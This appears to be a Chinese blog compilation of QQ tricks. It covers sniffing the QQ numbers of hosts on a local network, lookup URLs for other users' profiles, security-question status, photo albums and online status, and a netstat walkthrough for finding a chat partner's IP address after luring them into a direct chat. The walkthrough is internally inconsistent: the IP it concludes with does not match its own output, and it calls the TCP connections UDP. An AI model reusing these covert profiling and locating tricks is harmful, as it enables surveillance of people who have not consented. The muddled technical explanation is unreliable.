　　在找出的在线主机上，点击你要找的机器IP地址号，然后点击监听QQ号，很快QQ号码就会显示在左边的空栏中。



找到QQ号之后点击停止监听即可。

绝版青春

QQ查询综合


   
1. 查询QQ财富 红黄蓝钻的开通情况等
  http://qqshow.qq.com/cgi-bin/qqshow_user_info?uin=
网址后添加需查询的QQ号


2. 查询QQ密保申请情况
  http://service.qq.com/psw/mo.shtml?psw_cs.htm
输入后填个验证码就知道号码有没申请密保了

3. 查询QQ号码的详细资料
原始资料大多都可以查
  http://bbs.qq.com/cgi-bin/bbs/friend/user_info_show?ln=
网址后添加需查询的QQ号

4. 查询QQ号码申诉记录:
http://service.qq.com/cgi-bin/announce

5. 查询对方QQ相册
http://photo.qq.com/cgi-bin/listexalbum?ownerid=
网址后添加需查询的QQ号


6.和任意QQ免验证 直接聊天
http://wpa.qq.com/msgrd?V=1&Uin=
网址后添加QQ号


7.不用登录QQ，直接查看任意号码状态
http://wpa.qq.com/pa?p=1:********:4
其中********就是你要看的号码了


8.直接访问QQ好友的Q-zone
http://q-zone.qq.com/client/?uin=
网址后添加QQ号

绝版青春

用DOS命令查QQ好友IP地址


   
用DOS命令查QQ好友IP地址

查QQ好友IP地址还用得着这么麻烦吗？给QQ打个补丁不就行了吗？不错，这样做是很简单，但是如果是新出的QQ，“补丁”还没有做出来那又该怎么办呢？用IpSniper等软件呗，如果手头上没有又急着查又该怎么办呢？可以用其他软件，比方说……好了，说来说去都要别人的软件，为什么不试试DOS命令呢？即简单，又方便，还很环保（不像应用软件还得另外安装占用硬盘空间，使用时还占用相同资源）。

　　不多嗦了，正式开始。 首先，用甜言蜜语、糖衣炮弹之类的武器把你想知道IP地址的那个人“请”到QQ的“二人世界”里。接着，我们在DOS窗口里(Win9x下叫DOS，Win2000下叫命令提示符)。输入如下命令：

　　netstat -n

　　你将看到：

　　Active Connections
　　Proto 　　Local Address 　　Foreign Address 　　　State
　　TCP 　202.109.34.78:1200 　202.121.139.35:61555 　ESTABLISHED
　　TCP 　202.109.34.78:2694 　202.109.72.40:6667 　　ESTABLISHED
　　TCP 　202.109.34.78:4869 　211.202.1.227:23 　　　ESTABLISHED

　　好家伙，这么多IP！哪个才是我们要找的呢？别着急，往后看。我们现在退出“二人世界”，然后在DOS下再输入一次：

　　netstat -n

　　你将看到：

　　Active Connections
　　Proto 　　Local Address 　　　Foreign Address 　　　State
　　TCP 　　202.109.34.78:1200 　202.121.139.35:61555 　TIME_WAIT
　　TCP 　　202.109.34.78:2694 　202.109.72.40:6667 　　ESTABLISHED
　　TCP 　　202.109.34.78:4869 　211.202.1.227:23 　　　ESTABLISHED

　　看出前后两次的区别了吗？没有看出来？仔细着看，你会发现：

　　原来：TCP 202.109.34.78:1200 202.121.139.35:61555 ESTABLISHED
　　现在：TCP 202.109.34.78:1200 202.121.139.35:61555 TIME_WAIT

　　好了，现在你该知道了吧？对！和你聊天的人的IP就是：202.101.139.35！那你是怎么知道的呢？朋友，请看我们在“二人世界”时要传送消息，相互之间必然要产生连接（通过UDP协议），此时自然是“ESTABLISHED”了（以你用netstat -n命令的结果来说）；而退出“二人世界”连接就断开了，自然就是“TIME_WAIT”了。

　　很简单吧？用这种方法一个外来软件也没有用(netstat是Windows自带外部命令)，是不是向我们前面所说的那样即简单又方便，还很环保？还不快试试！